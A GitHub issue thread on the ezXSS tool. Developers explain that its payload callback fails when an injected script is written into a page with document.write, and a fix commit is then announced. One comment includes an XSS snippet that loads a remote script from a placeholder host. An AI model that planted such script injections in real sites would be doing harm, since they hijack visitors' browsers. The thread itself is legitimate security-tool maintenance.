Comments (5)
Hey @Geluchat,
Thanks for this. Do you maybe have an example of a website where this is not triggered?
Do you mean that some sites never trigger it, or do you mean that the page might be closed before being completely loaded? Or is there some kind of error involved that the page is not 'loaded'?
Hope to hear from you.
from ezxss.
Because it might be even better to change "complete" to "loading" or "interactive". But it needs some debugging.
from ezxss.
Hello,
To illustrate, when a website utilizes document.write(XSS), the document remains in a loaded state. The MDN documentation provides insight into this concern. You can refer to the relevant section here: MDN's Document.write. To quote: "document.write() writes to the document stream, and invoking document.write() on an already loaded document implicitly triggers document.open(), resulting in the clearing of the document."
Below is a code snippet that demonstrates the issue:
document.write('<script src="//PAYLOAD"></script>')
Best regards,
from ezxss.
Thanks! I will look into this, do some debugging and will fix accordingly.
from ezxss.
Fixed in d06f862
from ezxss.